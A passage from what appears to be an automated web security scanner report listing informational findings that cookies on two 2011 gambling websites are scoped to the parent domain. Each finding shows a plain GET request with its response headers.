Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.212. http://www.scratchcardheaven.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.213. http://www.scratchcardheaven.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.214. http://www.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

11.215. http://www.scratchcardheaven.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.216. http://www.scratchcardheaven.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.217. http://www.scratchcardheaven.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.218. http://www.scratchcardheaven.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.219. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.220. http://www.scratchcardheaven.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

11.221. http://www.scratchcardheaven.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.222. http://www.svenskalotter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.223. http://www.svenskalotter.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.224. http://www.svenskalotter.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Affiliates.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
